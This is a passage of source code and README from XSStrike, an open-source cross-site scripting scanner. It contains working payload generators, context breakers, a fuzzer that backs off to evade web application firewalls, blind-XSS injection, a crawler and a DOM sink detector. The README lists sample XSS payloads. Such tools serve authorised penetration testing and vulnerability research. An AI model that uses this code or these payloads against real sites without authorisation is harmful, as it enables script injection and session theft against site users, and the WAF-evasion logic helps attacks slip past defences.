if xsschecker in match:
scripts.append(match)
return scripts
def randomUpper(string):
return ''.join(random.choice((x, y)) for x, y in zip(string.upper(), string.lower()))
def flattenParams(currentParam, params, payload):
flatted = []
for name, value in params.items():
if name == currentParam:
value = payload
flatted.append(name + '=' + value)
return '?' + '&'.join(flatted)
def genGen(fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, badTag=None):
vectors = []
r = randomUpper # randomUpper randomly converts chars of a string to uppercase
for tag in tags:
if tag == 'd3v' or tag == 'a':
bait = xsschecker
else:
bait = ''
for eventHandler in eventHandlers:
# if the tag is compatible with the event handler
if tag in eventHandlers[eventHandler]:
for function in functions:
for filling in fillings:
for eFilling in eFillings:
for lFilling in lFillings:
for end in ends:
if tag == 'd3v' or tag == 'a':
if '>' in ends:
end = '>' # we can't use // as > with "a" or "d3v" tag
breaker = ''
if badTag:
breaker = '</' + r(badTag) + '>'
vector = breaker + '<' + r(tag) + filling + r(
eventHandler) + eFilling + '=' + eFilling + function + lFilling + end + bait
vectors.append(vector)
return vectors
def getParams(url, data, GET):
params = {}
if '?' in url and '=' in url:
data = url.split('?')[1]
if data[:1] == '?':
data = data[1:]
elif data:
if getVar('jsonData') or getVar('path'):
params = data
else:
try:
params = json.loads(data.replace('\'', '"'))
return params
except json.decoder.JSONDecodeError:
pass
else:
return None
if not params:
parts = data.split('&')
for part in parts:
each = part.split('=')
if len(each) < 2:
each.append('')
try:
params[each[0]] = each[1]
except IndexError:
params = None
return params
def writer(obj, path):
kind = str(type(obj)).split('\'')[0]
if kind == 'list' or kind == 'tuple':
obj = '\n'.join(obj)
elif kind == 'dict':
obj = json.dumps(obj, indent=4)
savefile = open(path, 'w+')
savefile.write(str(obj.encode('utf-8')))
savefile.close()
def reader(path):
with open(path, 'r') as f:
result = [line.rstrip(
'\n').encode('utf-8').decode('utf-8') for line in f]
return result
def js_extractor(response):
"""Extract js files from the response body"""
scripts = []
matches = re.findall(r'<(?:script|SCRIPT).*?(?:src|SRC)=([^\s>]+)', response)
for match in matches:
match = match.replace('\'', '').replace('"', '').replace('`', '')
scripts.append(match)
return scripts
def handle_anchor(parent_url, url):
scheme = urlparse(parent_url).scheme
if url[:4] == 'http':
return url
elif url[:2] == '//':
return scheme + ':' + url
elif url.startswith('/'):
host = urlparse(parent_url).netloc
scheme = urlparse(parent_url).scheme
parent_url = scheme + '://' + host
return parent_url + url
elif parent_url.endswith('/'):
return parent_url + url
else:
return parent_url + '/' + url
def deJSON(data):
return data.replace('\\\\', '\\')
def getVar(name):
return core.config.globalVariables[name]
def updateVar(name, data, mode=None):
if mode:
if mode == 'append':
core.config.globalVariables[name].append(data)
elif mode == 'add':
core.config.globalVariables[name].add(data)
else:
core.config.globalVariables[name] = data
def isBadContext(position, non_executable_contexts):
badContext = ''
for each in non_executable_contexts:
if each[0] < position < each[1]:
badContext = each[2]
break
return badContext
def equalize(array, number):
if len(array) < number:
array.append('')
def escaped(position, string):
usable = string[:position][::-1]
match = re.search(r'^\\*', usable)
if match:
match = match.group()
if len(match) == 1:
return True
elif len(match) % 2 == 0:
return False
else:
return True
else:
return False
File: core/jsContexter.py
import re
from core.config import xsschecker
from core.utils import stripper
def jsContexter(script):
broken = script.split(xsschecker)
pre = broken[0]
# remove everything that is between {..}, "..." or '...'
pre = re.sub(r'(?s)\{.*?\}|(?s)\(.*?\)|(?s)".*?"|(?s)\'.*?\'', '', pre)
breaker = ''
num = 0
for char in pre: # iterate over the remaining characters
if char == '{':
breaker += '}'
elif char == '(':
breaker += ';)' # yes, it should be ); but we will invert the whole thing later
elif char == '[':
breaker += ']'
elif char == '/':
try:
if pre[num + 1] == '*':
breaker += '/*'
except IndexError:
pass
elif char == '}': # we encountered a } so we will strip off "our }" because this one does the job
breaker = stripper(breaker, '}')
elif char == ')': # we encountered a ) so we will strip off "our }" because this one does the job
breaker = stripper(breaker, ')')
elif breaker == ']': # we encountered a ] so we will strip off "our }" because this one does the job
breaker = stripper(breaker, ']')
num += 1
return breaker[::-1] # invert the breaker string
File: core/fuzzer.py
import copy
from random import randint
from time import sleep
from urllib.parse import unquote
from core.colors import end, red, green, yellow
from core.config import fuzzes, xsschecker
from core.requester import requester
from core.utils import replaceValue, counter
from core.log import setup_logger
logger = setup_logger(__name__)
def fuzzer(url, params, headers, GET, delay, timeout, WAF, encoding):
for fuzz in fuzzes:
if delay == 0:
delay = 0
t = delay + randint(delay, delay * 2) + counter(fuzz)
sleep(t)
try:
if encoding:
fuzz = encoding(unquote(fuzz))
data = replaceValue(params, xsschecker, fuzz, copy.deepcopy)
response = requester(url, data, headers, GET, delay/2, timeout)
except:
logger.error('WAF is dropping suspicious requests.')
if delay == 0:
logger.info('Delay has been increased to %s6%s seconds.' % (green, end))
delay += 6
limit = (delay + 1) * 50
timer = -1
while timer < limit:
logger.info('\rFuzzing will continue after %s%i%s seconds.\t\t\r' % (green, limit, end))
limit -= 1
sleep(1)
try:
requester(url, params, headers, GET, 0, 10)
logger.good('Pheww! Looks like sleeping for %s%i%s seconds worked!' % (
green, ((delay + 1) * 2), end))
except:
logger.error('\nLooks like WAF has blocked our IP Address. Sorry!')
break
if encoding:
fuzz = encoding(fuzz)
if fuzz.lower() in response.text.lower(): # if fuzz string is reflected in the response
result = ('%s[passed] %s' % (green, end))
# if the server returned an error (Maybe WAF blocked it)
elif str(response.status_code)[:1] != '2':
result = ('%s[blocked] %s' % (red, end))
else: # if the fuzz string was not reflected in the response completely
result = ('%s[filtered]%s' % (yellow, end))
logger.info('%s %s' % (result, fuzz))
File: core/filterChecker.py
from core.checker import checker
def filterChecker(url, params, headers, GET, delay, occurences, timeout, encoding):
positions = occurences.keys()
sortedEfficiencies = {}
# adding < > to environments anyway because they can be used in all contexts
environments = set(['<', '>'])
for i in range(len(positions)):
sortedEfficiencies[i] = {}
for i in occurences:
occurences[i]['score'] = {}
context = occurences[i]['context']
if context == 'comment':
environments.add('-->')
elif context == 'script':
environments.add(occurences[i]['details']['quote'])
environments.add('</scRipT/>')
elif context == 'attribute':
if occurences[i]['details']['type'] == 'value':
if occurences[i]['details']['name'] == 'srcdoc': # srcdoc attribute accepts html data with html entity encoding
environments.add('<') # so let's add the html entity
environments.add('>') # encoded versions of < and >
if occurences[i]['details']['quote']:
environments.add(occurences[i]['details']['quote'])
for environment in environments:
if environment:
efficiencies = checker(
url, params, headers, GET, delay, environment, positions, timeout, encoding)
efficiencies.extend([0] * (len(occurences) - len(efficiencies)))
for occurence, efficiency in zip(occurences, efficiencies):
occurences[occurence]['score'][environment] = efficiency
return occurences
File: core/prompt.py
import os
import tempfile
from core.config import defaultEditor
from core.colors import white, yellow
from core.log import setup_logger
logger = setup_logger(__name__)
def prompt(default=None):
# try assigning default editor, if fails, use default
editor = os.environ.get('EDITOR', defaultEditor)
# create a temporary file and open it
with tempfile.NamedTemporaryFile(mode='r+') as tmpfile:
if default: # if prompt should have some predefined text
tmpfile.write(default)
tmpfile.flush()
child_pid = os.fork()
is_child = child_pid == 0
if is_child:
# opens the file in the editor
try:
os.execvp(editor, [editor, tmpfile.name])
except FileNotFoundError:
logger.error('You don\'t have either a default $EDITOR \
value defined nor \'nano\' text editor')
logger.info('Execute %s`export EDITOR=/pat/to/your/editor` \
%sthen run XSStrike again.\n\n' % (yellow,white))
exit(1)
else:
os.waitpid(child_pid, 0) # wait till the editor gets closed
tmpfile.seek(0)
return tmpfile.read().strip() # read the file
File: core/checker.py
import copy
from fuzzywuzzy import fuzz
import re
from urllib.parse import unquote
from core.config import xsschecker
from core.requester import requester
from core.utils import replaceValue, fillHoles
def checker(url, params, headers, GET, delay, payload, positions, timeout, encoding):
checkString = 'st4r7s' + payload + '3nd'
if encoding:
checkString = encoding(unquote(checkString))
response = requester(url, replaceValue(
params, xsschecker, checkString, copy.deepcopy), headers, GET, delay, timeout).text.lower()
reflectedPositions = []
for match in re.finditer('st4r7s', response):
reflectedPositions.append(match.start())
filledPositions = fillHoles(positions, reflectedPositions)
# Itretating over the reflections
num = 0
efficiencies = []
for position in filledPositions:
allEfficiencies = []
try:
reflected = response[reflectedPositions[num]
:reflectedPositions[num]+len(checkString)]
efficiency = fuzz.partial_ratio(reflected, checkString.lower())
allEfficiencies.append(efficiency)
except IndexError:
pass
if position:
reflected = response[position:position+len(checkString)]
if encoding:
checkString = encoding(checkString.lower())
efficiency = fuzz.partial_ratio(reflected, checkString)
if reflected[:-2] == ('\\%s' % checkString.replace('st4r7s', '').replace('3nd', '')):
efficiency = 90
allEfficiencies.append(efficiency)
efficiencies.append(max(allEfficiencies))
else:
efficiencies.append(0)
num += 1
return list(filter(None, efficiencies))
File: core/photon.py
import re
import concurrent.futures
from urllib.parse import urlparse
from core.dom import dom
from core.log import setup_logger
from core.utils import getUrl, getParams
from core.requester import requester
from core.zetanize import zetanize
from plugins.retireJs import retireJs
logger = setup_logger(__name__)
def photon(seedUrl, headers, level, threadCount, delay, timeout, skipDOM):
forms = [] # web forms
processed = set() # urls that have been crawled
storage = set() # urls that belong to the target i.e. in-scope
schema = urlparse(seedUrl).scheme # extract the scheme e.g. http or https
host = urlparse(seedUrl).netloc # extract the host e.g. example.com
main_url = schema + '://' + host # join scheme and host to make the root url
storage.add(seedUrl) # add the url to storage
checkedDOMs = []
def rec(target):
processed.add(target)
printableTarget = '/'.join(target.split('/')[3:])
if len(printableTarget) > 40:
printableTarget = printableTarget[-40:]
else:
printableTarget = (printableTarget + (' ' * (40 - len(printableTarget))))
logger.run('Parsing %s\r' % printableTarget)
url = getUrl(target, True)
params = getParams(target, '', True)
if '=' in target: # if there's a = in the url, there should be GET parameters
inps = []
for name, value in params.items():
inps.append({'name': name, 'value': value})
forms.append({0: {'action': url, 'method': 'get', 'inputs': inps}})
response = requester(url, params, headers, True, delay, timeout).text
retireJs(url, response)
if not skipDOM:
highlighted = dom(response)
clean_highlighted = ''.join([re.sub(r'^\d+\s+', '', line) for line in highlighted])
if highlighted and clean_highlighted not in checkedDOMs:
checkedDOMs.append(clean_highlighted)
logger.good('Potentially vulnerable objects found at %s' % url)
logger.red_line(level='good')
for line in highlighted:
logger.no_format(line, level='good')
logger.red_line(level='good')
forms.append(zetanize(response))
matches = re.findall(r'<[aA].*href=["\']{0,1}(.*?)["\']', response)
for link in matches: # iterate over the matches
# remove everything after a "#" to deal with in-page anchors
link = link.split('#')[0]
if link.endswith(('.pdf', '.png', '.jpg', '.jpeg', '.xls', '.xml', '.docx', '.doc')):
pass
else:
if link[:4] == 'http':
if link.startswith(main_url):
storage.add(link)
elif link[:2] == '//':
if link.split('/')[2].startswith(host):
storage.add(schema + link)
elif link[:1] == '/':
storage.add(main_url + link)
else:
storage.add(main_url + '/' + link)
try:
for x in range(level):
urls = storage - processed # urls to crawl = all urls - urls that have been crawled
# for url in urls:
# rec(url)
threadpool = concurrent.futures.ThreadPoolExecutor(
max_workers=threadCount)
futures = (threadpool.submit(rec, url) for url in urls)
for i in concurrent.futures.as_completed(futures):
pass
except KeyboardInterrupt:
return [forms, processed]
return [forms, processed]
File: core/dom.py
import re
from core.colors import end, red, yellow
if len(end) < 1:
end = red = yellow = '*'
def dom(response):
highlighted = []
sources = r'''\b(?:document\.(URL|documentURI|URLUnencoded|baseURI|cookie|referrer)|location\.(href|search|hash|pathname)|window\.name|history\.(pushState|replaceState)(local|session)Storage)\b'''
sinks = r'''\b(?:eval|evaluate|execCommand|assign|navigate|getResponseHeaderopen|showModalDialog|Function|set(Timeout|Interval|Immediate)|execScript|crypto.generateCRMFRequest|ScriptElement\.(src|text|textContent|innerText)|.*?\.onEventName|document\.(write|writeln)|.*?\.innerHTML|Range\.createContextualFragment|(document|window)\.location)\b'''
scripts = re.findall(r'(?i)(?s)<script[^>]*>(.*?)</script>', response)
sinkFound, sourceFound = False, False
for script in scripts:
script = script.split('\n')
num = 1
allControlledVariables = set()
try:
for newLine in script:
line = newLine
parts = line.split('var ')
controlledVariables = set()
if len(parts) > 1:
for part in parts:
for controlledVariable in allControlledVariables:
if controlledVariable in part:
controlledVariables.add(re.search(r'[a-zA-Z$_][a-zA-Z0-9$_]+', part).group().replace('$', '\$'))
pattern = re.finditer(sources, newLine)
for grp in pattern:
if grp:
source = newLine[grp.start():grp.end()].replace(' ', '')
if source:
if len(parts) > 1:
for part in parts:
if source in part:
controlledVariables.add(re.search(r'[a-zA-Z$_][a-zA-Z0-9$_]+', part).group().replace('$', '\$'))
line = line.replace(source, yellow + source + end)
for controlledVariable in controlledVariables:
allControlledVariables.add(controlledVariable)
for controlledVariable in allControlledVariables:
matches = list(filter(None, re.findall(r'\b%s\b' % controlledVariable, line)))
if matches:
sourceFound = True
line = re.sub(r'\b%s\b' % controlledVariable, yellow + controlledVariable + end, line)
pattern = re.finditer(sinks, newLine)
for grp in pattern:
if grp:
sink = newLine[grp.start():grp.end()].replace(' ', '')
if sink:
line = line.replace(sink, red + sink + end)
sinkFound = True
if line != newLine:
highlighted.append('%-3s %s' % (str(num), line.lstrip(' ')))
num += 1
except MemoryError:
pass
if sinkFound or sourceFound:
return highlighted
else:
return []
File: core/colors.py
import sys
import os
import platform
colors = True # Output should be colored
machine = sys.platform # Detecting the os of current system
checkplatform = platform.platform() # Get current version of OS
if machine.lower().startswith(('os', 'win', 'darwin', 'ios')):
colors = False # Colors shouldn't be displayed on mac & windows
if checkplatform.startswith("Windows-10") and int(platform.version().split(".")[2]) >= 10586:
colors = True
os.system('') # Enables the ANSI
if not colors:
end = red = white = green = yellow = run = bad = good = info = que = ''
else:
white = '\033[97m'
green = '\033[92m'
red = '\033[91m'
yellow = '\033[93m'
end = '\033[0m'
back = '\033[7;91m'
info = '\033[93m[!]\033[0m'
que = '\033[94m[?]\033[0m'
bad = '\033[91m[-]\033[0m'
good = '\033[92m[+]\033[0m'
run = '\033[97m[~]\033[0m'
File: modes/crawl.py
import copy
import re
import core.config
from core.colors import green, end
from core.config import xsschecker
from core.filterChecker import filterChecker
from core.generator import generator
from core.htmlParser import htmlParser
from core.requester import requester
from core.log import setup_logger
logger = setup_logger(__name__)
def crawl(scheme, host, main_url, form, blindXSS, blindPayload, headers, delay, timeout, encoding):
if form:
for each in form.values():
url = each['action']
if url:
if url.startswith(main_url):
pass
elif url.startswith('//') and url[2:].startswith(host):
url = scheme + '://' + url[2:]
elif url.startswith('/'):
url = scheme + '://' + host + url
elif re.match(r'\w', url[0]):
url = scheme + '://' + host + '/' + url
if url not in core.config.globalVariables['checkedForms']:
core.config.globalVariables['checkedForms'][url] = []
method = each['method']
GET = True if method == 'get' else False
inputs = each['inputs']
paramData = {}
for one in inputs:
paramData[one['name']] = one['value']
for paramName in paramData.keys():
if paramName not in core.config.globalVariables['checkedForms'][url]:
core.config.globalVariables['checkedForms'][url].append(paramName)
paramsCopy = copy.deepcopy(paramData)
paramsCopy[paramName] = xsschecker
response = requester(
url, paramsCopy, headers, GET, delay, timeout)
occurences = htmlParser(response, encoding)
positions = occurences.keys()
occurences = filterChecker(
url, paramsCopy, headers, GET, delay, occurences, timeout, encoding)
vectors = generator(occurences, response.text)
if vectors:
for confidence, vects in vectors.items():
try:
payload = list(vects)[0]
logger.vuln('Vulnerable webpage: %s%s%s' %
(green, url, end))
logger.vuln('Vector for %s%s%s: %s' %
(green, paramName, end, payload))
break
except IndexError:
pass
if blindXSS and blindPayload:
paramsCopy[paramName] = blindPayload
requester(url, paramsCopy, headers,
GET, delay, timeout)
File: modes/singleFuzz.py
import copy
from urllib.parse import urlparse
from core.colors import green, end
from core.config import xsschecker
from core.fuzzer import fuzzer
from core.requester import requester
from core.utils import getUrl, getParams
from core.wafDetector import wafDetector
from core.log import setup_logger
logger = setup_logger(__name__)
def singleFuzz(target, paramData, encoding, headers, delay, timeout):
GET, POST = (False, True) if paramData else (True, False)
# If the user hasn't supplied the root url with http(s), we will handle it
if not target.startswith('http'):
try:
response = requester('https://' + target, {},
headers, GET, delay, timeout)
target = 'https://' + target
except:
target = 'http://' + target
logger.debug('Single Fuzz target: {}'.format(target))
host = urlparse(target).netloc # Extracts host out of the url
logger.debug('Single fuzz host: {}'.format(host))
url = getUrl(target, GET)
logger.debug('Single fuzz url: {}'.format(url))
params = getParams(target, paramData, GET)
logger.debug_json('Single fuzz params:', params)
if not params:
logger.error('No parameters to test.')
quit()
WAF = wafDetector(
url, {list(params.keys())[0]: xsschecker}, headers, GET, delay, timeout)
if WAF:
logger.error('WAF detected: %s%s%s' % (green, WAF, end))
else:
logger.good('WAF Status: %sOffline%s' % (green, end))
for paramName in params.keys():
logger.info('Fuzzing parameter: %s' % paramName)
paramsCopy = copy.deepcopy(params)
paramsCopy[paramName] = xsschecker
fuzzer(url, paramsCopy, headers, GET,
delay, timeout, WAF, encoding)
File: modes/__init__.py
File: modes/bruteforcer.py
import copy
from urllib.parse import urlparse, unquote
from core.colors import good, green, end
from core.requester import requester
from core.utils import getUrl, getParams
from core.log import setup_logger
logger = setup_logger(__name__)
def bruteforcer(target, paramData, payloadList, encoding, headers, delay, timeout):
GET, POST = (False, True) if paramData else (True, False)
host = urlparse(target).netloc # Extracts host out of the url
logger.debug('Parsed host to bruteforce: {}'.format(host))
url = getUrl(target, GET)
logger.debug('Parsed url to bruteforce: {}'.format(url))
params = getParams(target, paramData, GET)
logger.debug_json('Bruteforcer params:', params)
if not params:
logger.error('No parameters to test.')
quit()
for paramName in params.keys():
progress = 1
paramsCopy = copy.deepcopy(params)
for payload in payloadList:
logger.run('Bruteforcing %s[%s%s%s]%s: %i/%i\r' %
(green, end, paramName, green, end, progress, len(payloadList)))
if encoding:
payload = encoding(unquote(payload))
paramsCopy[paramName] = payload
response = requester(url, paramsCopy, headers,
GET, delay, timeout).text
if encoding:
payload = encoding(payload)
if payload in response:
logger.info('%s %s' % (good, payload))
progress += 1
logger.no_format('')
File: modes/scan.py
import copy
import re
from urllib.parse import urlparse, quote, unquote
from core.checker import checker
from core.colors import end, green, que
import core.config
from core.config import xsschecker, minEfficiency
from core.dom import dom
from core.filterChecker import filterChecker
from core.generator import generator
from core.htmlParser import htmlParser
from core.requester import requester
from core.utils import getUrl, getParams, getVar
from core.wafDetector import wafDetector
from core.log import setup_logger
logger = setup_logger(__name__)
def scan(target, paramData, encoding, headers, delay, timeout, skipDOM, skip):
GET, POST = (False, True) if paramData else (True, False)
# If the user hasn't supplied the root url with http(s), we will handle it
if not target.startswith('http'):
try:
response = requester('https://' + target, {},
headers, GET, delay, timeout)
target = 'https://' + target
except:
target = 'http://' + target
logger.debug('Scan target: {}'.format(target))
response = requester(target, {}, headers, GET, delay, timeout).text
if not skipDOM:
logger.run('Checking for DOM vulnerabilities')
highlighted = dom(response)
if highlighted:
logger.good('Potentially vulnerable objects found')
logger.red_line(level='good')
for line in highlighted:
logger.no_format(line, level='good')
logger.red_line(level='good')
host = urlparse(target).netloc # Extracts host out of the url
logger.debug('Host to scan: {}'.format(host))
url = getUrl(target, GET)
logger.debug('Url to scan: {}'.format(url))
params = getParams(target, paramData, GET)
logger.debug_json('Scan parameters:', params)
if not params:
logger.error('No parameters to test.')
quit()
WAF = wafDetector(
url, {list(params.keys())[0]: xsschecker}, headers, GET, delay, timeout)
if WAF:
logger.error('WAF detected: %s%s%s' % (green, WAF, end))
else:
logger.good('WAF Status: %sOffline%s' % (green, end))
for paramName in params.keys():
paramsCopy = copy.deepcopy(params)
logger.info('Testing parameter: %s' % paramName)
if encoding:
paramsCopy[paramName] = encoding(xsschecker)
else:
paramsCopy[paramName] = xsschecker
response = requester(url, paramsCopy, headers, GET, delay, timeout)
occurences = htmlParser(response, encoding)
positions = occurences.keys()
logger.debug('Scan occurences: {}'.format(occurences))
if not occurences:
logger.error('No reflection found')
continue
else:
logger.info('Reflections found: %i' % len(occurences))
logger.run('Analysing reflections')
efficiencies = filterChecker(
url, paramsCopy, headers, GET, delay, occurences, timeout, encoding)
logger.debug('Scan efficiencies: {}'.format(efficiencies))
logger.run('Generating payloads')
vectors = generator(occurences, response.text)
total = 0
for v in vectors.values():
total += len(v)
if total == 0:
logger.error('No vectors were crafted.')
continue
logger.info('Payloads generated: %i' % total)
progress = 0
for confidence, vects in vectors.items():
for vect in vects:
if core.config.globalVariables['path']:
vect = vect.replace('/', '%2F')
loggerVector = vect
progress += 1
logger.run('Progress: %i/%i\r' % (progress, total))
if not GET:
vect = unquote(vect)
efficiencies = checker(
url, paramsCopy, headers, GET, delay, vect, positions, timeout, encoding)
if not efficiencies:
for i in range(len(occurences)):
efficiencies.append(0)
bestEfficiency = max(efficiencies)
if bestEfficiency == 100 or (vect[0] == '\\' and bestEfficiency >= 95):
logger.red_line()
logger.good('Payload: %s' % loggerVector)
logger.info('Efficiency: %i' % bestEfficiency)
logger.info('Confidence: %i' % confidence)
if not skip:
choice = input(
'%s Would you like to continue scanning? [y/N] ' % que).lower()
if choice != 'y':
quit()
elif bestEfficiency > minEfficiency:
logger.red_line()
logger.good('Payload: %s' % loggerVector)
logger.info('Efficiency: %i' % bestEfficiency)
logger.info('Confidence: %i' % confidence)
logger.no_format('')
File: plugins/__init__.py
File: plugins/retireJs.py
import re
import json
import hashlib
from urllib.parse import urlparse
from core.colors import green, end
from core.requester import requester
from core.utils import deJSON, js_extractor, handle_anchor, getVar, updateVar
from core.log import setup_logger
logger = setup_logger(__name__)
def is_defined(o):
return o is not None
def scan(data, extractor, definitions, matcher=None):
matcher = matcher or _simple_match
detected = []
for component in definitions:
extractors = definitions[component].get(
"extractors", None).get(
extractor, None)
if (not is_defined(extractors)):
continue
for i in extractors:
match = matcher(i, data)
if (match):
detected.append({"version": match,
"component": component,
"detection": extractor})
return detected
def _simple_match(regex, data):
regex = deJSON(regex)
match = re.search(regex, data)
return match.group(1) if match else None
def _replacement_match(regex, data):
try:
regex = deJSON(regex)
group_parts_of_regex = r'^\/(.*[^\\])\/([^\/]+)\/$'
ar = re.search(group_parts_of_regex, regex)
search_for_regex = "(" + ar.group(1) + ")"
match = re.search(search_for_regex, data)
ver = None
if (match):
ver = re.sub(ar.group(1), ar.group(2), match.group(0))
return ver
return None
except:
return None
def _scanhash(hash, definitions):
for component in definitions:
hashes = definitions[component].get("extractors", None).get("hashes", None)
if (not is_defined(hashes)):
continue
for i in hashes:
if (i == hash):
return [{"version": hashes[i],
"component": component,
"detection": 'hash'}]
return []
def check(results, definitions):
for r in results:
result = r
if (not is_defined(definitions[result.get("component", None)])):
continue
vulns = definitions[
result.get(
"component",
None)].get(
"vulnerabilities",
None)
for i in range(len(vulns)):
if (not _is_at_or_above(result.get("version", None),
vulns[i].get("below", None))):
if (is_defined(vulns[i].get("atOrAbove", None)) and not _is_at_or_above(
result.get("version", None), vulns[i].get("atOrAbove", None))):
continue
vulnerability = {"info": vulns[i].get("info", None)}
if (vulns[i].get("severity", None)):
vulnerability["severity"] = vulns[i].get("severity", None)
if (vulns[i].get("identifiers", None)):
vulnerability["identifiers"] = vulns[
i].get("identifiers", None)
result["vulnerabilities"] = result.get(
"vulnerabilities", None) or []
result["vulnerabilities"].append(vulnerability)
return results
def unique(ar):
return list(set(ar))
def _is_at_or_above(version1, version2):
# print "[",version1,",", version2,"]"
v1 = re.split(r'[.-]', version1)
v2 = re.split(r'[.-]', version2)
l = len(v1) if len(v1) > len(v2) else len(v2)
for i in range(l):
v1_c = _to_comparable(v1[i] if len(v1) > i else None)
v2_c = _to_comparable(v2[i] if len(v2) > i else None)
# print v1_c, "vs", v2_c
if (not isinstance(v1_c, type(v2_c))):
return isinstance(v1_c, int)
if (v1_c > v2_c):
return True
if (v1_c < v2_c):
return False
return True
def _to_comparable(n):
if (not is_defined(n)):
return 0
if (re.search(r'^[0-9]+$', n)):
return int(str(n), 10)
return n
def _replace_version(jsRepoJsonAsText):
return re.sub(r'[.0-9]*', '[0-9][0-9.a-z_\-]+', jsRepoJsonAsText)
def is_vulnerable(results):
for r in results:
if ('vulnerabilities' in r):
# print r
return True
return False
def scan_uri(uri, definitions):
result = scan(uri, 'uri', definitions)
return check(result, definitions)
def scan_filename(fileName, definitions):
result = scan(fileName, 'filename', definitions)
return check(result, definitions)
def scan_file_content(content, definitions):
result = scan(content, 'filecontent', definitions)
if (len(result) == 0):
result = scan(content, 'filecontentreplace', definitions, _replacement_match)
if (len(result) == 0):
result = _scanhash(
hashlib.sha1(
content.encode('utf8')).hexdigest(),
definitions)
return check(result, definitions)
def main_scanner(uri, response):
definitions = getVar('definitions')
uri_scan_result = scan_uri(uri, definitions)
filecontent = response
filecontent_scan_result = scan_file_content(filecontent, definitions)
uri_scan_result.extend(filecontent_scan_result)
result = {}
if uri_scan_result:
result['component'] = uri_scan_result[0]['component']
result['version'] = uri_scan_result[0]['version']
result['vulnerabilities'] = []
vulnerabilities = set()
for i in uri_scan_result:
k = set()
try:
for j in i['vulnerabilities']:
vulnerabilities.add(str(j))
except KeyError:
pass
for vulnerability in vulnerabilities:
result['vulnerabilities'].append(json.loads(vulnerability.replace('\'', '"')))
return result
def retireJs(url, response):
scripts = js_extractor(response)
for script in scripts:
if script not in getVar('checkedScripts'):
updateVar('checkedScripts', script, 'add')
uri = handle_anchor(url, script)
response = requester(uri, '', getVar('headers'), True, getVar('delay'), getVar('timeout')).text
result = main_scanner(uri, response)
if result:
logger.red_line()
logger.good('Vulnerable component: ' + result['component'] + ' v' + result['version'])
logger.info('Component location: %s' % uri)
details = result['vulnerabilities']
logger.info('Total vulnerabilities: %i' % len(details))
for detail in details:
logger.info('%sSummary:%s %s' % (green, end, detail['identifiers']['summary']))
logger.info('Severity: %s' % detail['severity'])
logger.info('CVE: %s' % detail['identifiers']['CVE'][0])
logger.red_line()
| <h1 align="center">
<br>
<a href="https://github.com/s0md3v/XSStrike"><img src="https://image.ibb.co/cpuYoA/xsstrike-logo.png" alt="XSStrike"></a>
<br>
XSStrike
<br>
</h1>
<h4 align="center">Advanced XSS Detection Suite</h4>
<p align="center">
<a href="https://github.com/s0md3v/XSStrike/releases">
<img src="https://img.shields.io/github/release/s0md3v/XSStrike.svg">
</a>
<a href="https://travis-ci.com/s0md3v/XSStrike">
<img src="https://img.shields.io/travis/com/s0md3v/XSStrike.svg">
</a>
<a href="https://github.com/s0md3v/XSStrike/issues?q=is%3Aissue+is%3Aclosed">
<img src="https://img.shields.io/github/issues-closed-raw/s0md3v/XSStrike.svg">
</a>
</p>
![multi xss](https://image.ibb.co/gOCV5L/Screenshot-2018-11-19-13-33-49.png)
<p align="center">
<a href="https://github.com/s0md3v/XSStrike/wiki">XSStrike Wiki</a> •
<a href="https://github.com/s0md3v/XSStrike/wiki/Usage">Usage</a> •
<a href="https://github.com/s0md3v/XSStrike/wiki/FAQ">FAQ</a> •
<a href="https://github.com/s0md3v/XSStrike/wiki/For-Developers">For Developers</a> •
<a href="https://github.com/s0md3v/XSStrike/wiki/Compatibility-&-Dependencies">Compatibility</a> •
<a href="https://github.com/s0md3v/XSStrike#gallery">Gallery</a>
</p>
XSStrike is a Cross Site Scripting detection suite equipped with four hand written parsers, an intelligent payload generator, a powerful fuzzing engine and an incredibly fast crawler.
Instead of injecting payloads and checking it works like all the other tools do, XSStrike analyses the response with multiple parsers and then crafts payloads that are guaranteed to work by context analysis integrated with a fuzzing engine.
Here are some examples of the payloads generated by XSStrike:
```
}]};(confirm)()//\
<A%0aONMouseOvER%0d=%0d[8].find(confirm)>z
</tiTlE/><a%0donpOintErentER%0d=%0d(prompt)``>z
</SCRiPT/><DETAILs/+/onpoINTERenTEr%0a=%0aa=prompt,a()//
```
Apart from that, XSStrike has crawling, fuzzing, parameter discovery, WAF detection capabilities as well. It also scans for DOM XSS vulnerabilities.
### Main Features
- Reflected and DOM XSS scanning
- Multi-threaded crawling
- Context analysis
- Configurable core
- WAF detection & evasion
- Outdated JS lib scanning
- Intelligent payload generator
- Handmade HTML & JavaScript parser
- Powerful fuzzing engine
- Blind XSS support
- Highly researched work-flow
- Complete HTTP support
- Bruteforce payloads from a file
- Powered by [Photon](https://github.com/s0md3v/Photon), [Zetanize](https://github.com/s0md3v/zetanize) and [Arjun](https://github.com/s0md3v/Arjun)
- Payload Encoding
### Documentation
- [Usage](https://github.com/s0md3v/XSStrike/wiki/Usage)
- [Compatibility & Dependencies](https://github.com/s0md3v/XSStrike/wiki/Compatibility-&-Dependencies)
### FAQ
- [It says fuzzywuzzy isn't installed but it is.](https://github.com/s0md3v/XSStrike/wiki/FAQ#it-says-fuzzywuzzy-is-not-installed-but-its)
- [What's up with Blind XSS?](https://github.com/s0md3v/XSStrike/wiki/FAQ#whats-up-with-blind-xss)
- [Why XSStrike boasts that it is the most advanced XSS detection suite?](https://github.com/s0md3v/XSStrike/wiki/FAQ#why-xsstrike-boasts-that-it-is-the-most-advanced-xss-detection-suite)
- [I like the project, what enhancements and features I can expect in future?](https://github.com/s0md3v/XSStrike/wiki/FAQ#i-like-the-project-what-enhancements-and-features-i-can-expect-in-future)
- [What's the false positive/negative rate?](https://github.com/s0md3v/XSStrike/wiki/FAQ#whats-the-false-positivenegative-rate)
- [Tool xyz works against the target, while XSStrike doesn't!](https://github.com/s0md3v/XSStrike/wiki/FAQ#tool-xyz-works-against-the-target-while-xsstrike-doesnt)
- [Can I copy it's code?](https://github.com/s0md3v/XSStrike/wiki/FAQ#can-i-copy-its-code)
- [What if I want to embed it into a proprietary software?](https://github.com/s0md3v/XSStrike/wiki/FAQ#what-if-i-want-to-embed-it-into-a-proprietary-software)
### Gallery
#### DOM XSS
![dom xss](https://image.ibb.co/bQaQ5L/Screenshot-2018-11-19-13-48-19.png)
#### Reflected XSS
![multi xss](https://image.ibb.co/gJogUf/Screenshot-2018-11-19-14-19-36.png)
#### Crawling
![crawling](https://image.ibb.co/e6Rezf/Screenshot-2018-11-19-13-50-59.png)
#### Fuzzing
